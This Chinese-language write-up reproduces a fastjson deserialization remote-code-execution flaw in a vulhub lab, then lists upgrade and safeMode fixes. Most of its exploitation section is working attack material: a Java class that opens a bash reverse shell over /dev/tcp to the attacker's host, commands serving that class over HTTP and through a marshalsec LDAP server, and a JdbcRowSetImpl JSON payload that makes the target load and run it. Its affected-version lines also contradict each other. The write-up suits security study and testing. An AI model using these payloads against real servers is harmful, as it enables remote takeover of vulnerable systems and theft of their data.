0x01 漏洞简介:
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。
阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。
0x02 影响版本:
fastjson<=1.2.24
该漏洞影响fastjson 1.2.80及之前所有版本
图示:
0x03 漏洞复现:
环境准备
被攻击主机:CentOS7(192.168.217.140)
JDK版本:1.8 (shell弹不进去请检查版本)
靶场环境:vulhub/fastjson-1.2.24-rce
攻击主机:kali(192.168.217.141)
使用工具:marshalsec-0.0.3-SNAPSHOT-all.jar ,
GitHub - RandomRobbieBF/marshalsec-jar: marshalsec-0.0.3-SNAPSHOT-all compiled on X64
- docker拉取镜像
docker-compose up -d
- 启动环境并访问,出现下面页面表示访问成功
漏洞验证:
- 配合dnslog申请个子域名来探测是否存在漏洞
- 访问192.168.217.140:8090,使用brup拦截请求
- 修改请求方法为post,修改 Content-Type为: application/json
- 添加请求正文,使用DNSLog进行验证:
{
"a":{
"@type":"java.net.Inet4Address",
"val":"申请的域名"
}
}
- 发送后,dns有返回,证明存在此漏洞
漏洞利用:
- 编辑恶意类,创建一个.java 的文件,以反弹shell为例,而后使用javac命令进行编译而后放于kali中
import java.lang.Runtime;
import java.lang.Process;
public class GetShell {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.217.141/4444 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
- 在cmd里面使用命令,编译为.class文件
javac GetShell.java
- 将生成的文件,放在kali上,并开放http将GetShell.class变成可以访问
python -m SimpleHTTPServer
- 然后下载前面的POC,上传至kali。起一个LDAP服务器监听6666端口,远程加载GetShell类,并同时打开监听反弹shell的端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.217.141:8000/#GetShell 6666
- 然后使用BP抓包,再次修改请求正文,使其下载恶意代码并执行
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.217.141:6666/GetShell",
"autoCommit":true
}
}
- 按照图示,点击发送
- 发送完成后,LDAP服务器接收到请求
- httpserver收到get请求
- 同时也接收到反弹shell,到此漏洞利用完成
0x04 修复方案:
- 建议升级到最新版本1.2.83
- safeMode加固。Fastjson在1.2.68及之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持 autoType,可杜绝反序列化Gadgets类变种攻击
- 升级至Fastjson v2